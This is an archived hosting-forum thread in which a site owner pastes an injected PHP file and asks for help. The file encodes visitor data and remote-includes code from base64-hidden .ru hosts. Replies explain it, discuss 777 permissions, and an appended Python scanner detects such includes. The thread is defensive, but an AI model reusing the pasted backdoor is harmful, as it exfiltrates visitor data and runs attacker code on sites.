Web Hosting Talk

View Full Version : Is this hacker code?


WebDesignGold
07-16-2006, 07:53 AM
I'm having trouble with a couple of sites. My host says I have security holes and that I'm probably being hacked. I did some researching on my files and directories and found several newly added files. Just one day old in fact. Here's the content of one of them. I'm not a coder myself and don't understand what this code is:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

tiamak
07-16-2006, 08:06 AM
can be :)
it includes (or at least tries to include) some code from http : / / user7 . htmltags . ru /?allinfoaboutyourwebvisitorhere

and i believe u have nothing in common with that russian site :)

WebDesignGold
07-16-2006, 08:33 AM
Thank you for your response. It was clearly a hacking thing. I've cleaned up all suspicious files and restored a clean backup. One site is working fine and I'm fixing the second one. Hope they don't strike again just when I'm done :)
I don't know what they are looking for. I don't have anything of value in there.

tiamak
07-16-2006, 08:35 AM
hehe they certainly do not look for anything u have but for your visitors :)
i can bet it includes some code that infects visitors pc

WebDesignGold
07-16-2006, 10:47 AM
I really hope not.
Furthermore, when I first discovered this, I did contact support. All they've been telling me is that I had several files/dirs chmoded to 777 and told me never to do that again. I'm wondering if this is true. I have a script that requires some dirs to have 777.
"Rename config.php.txt to config.php and chmod it to 666. Chmod your /attachments/ and /languages/ directories to 777. You may want to chmod your templates to 666 so that you can edit them through the online editor. Other items you may wish to chmod: searchlog.txt to 666, /admin/ to 777. Note: directory chmoding is server-specific, some servers may need 755 instead of 777. Warning: Never chmod a directory to 666."
As you can see, the script author is saying "never chmod a directory to 666" and is asking to chmod some dirs to 777. The support guys are telling me never to chmod dirs or files to 777.
Now I'm really confused. Who's right here? what should I do?

01globalnet
07-16-2006, 11:31 AM
What software are you using on those sites that were hacked?

Are you using open source scripts like phpBB, postnuke etc.? If yes, make sure you are on their mailing lists and whenever a new security announcement goes out just follow the instructions to patch your sites immediately.
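
Added example (not part of the thread and not code from any poster): a small Python triage script for the two things discussed above, PHP files whose include() target is assembled from base64_decode() literals like the file in the first post, and directories left world-writable (777). The function names, the file-extension list and the placeholder host example.invalid are assumptions made for this example.

```python
import base64, binascii, os, re, stat, sys

# base64_decode("...") string literals, the trick that hides the URL in the posted file
LITERAL_RE = re.compile(r'base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)', re.I)
# include/require whose argument starts with one or more concatenated literals
INCLUDE_RE = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(?\s*((?:' + LITERAL_RE.pattern + r'\s*\.?\s*)+)', re.I)
# Constructed sample with a placeholder host (not the file from the thread)
SAMPLE = ('<? if ((include(base64_decode("%s").base64_decode("%s")."/?".$str))){} ?>'
          % (base64.b64encode(b"http://").decode(), base64.b64encode(b"example.invalid").decode()))

def decode_include_targets(php_source):
    """Return the decoded prefix of every include() built from base64_decode() literals."""
    targets = []
    for m in INCLUDE_RE.finditer(php_source):
        try:
            parts = [base64.b64decode(lit) for lit in LITERAL_RE.findall(m.group(1))]
        except (binascii.Error, ValueError):
            continue  # literal is not valid base64, so it hides nothing we can decode
        targets.append(b"".join(parts).decode("latin-1"))
    return targets

def scan_webroot(root):
    """Report world-writable directories and PHP files that include a decoded URL."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        mode = stat.S_IMODE(os.stat(dirpath).st_mode)
        if mode & stat.S_IWOTH:  # e.g. 777: any local account can drop a file here
            findings.append(("world-writable-dir", dirpath, oct(mode)))
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                for target in decode_include_targets(fh.read()):
                    if re.match(r"(?:https?|ftp)://", target, re.I):
                        findings.append(("remote-include", path, target))
    return findings

if __name__ == "__main__":
    print(decode_include_targets(SAMPLE))
    for kind, path, detail in scan_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{kind}\t{path}\t{detail}")
```

Run it with the web root as the only argument; each output line is a finding type, a path, and either the directory mode or the decoded include target.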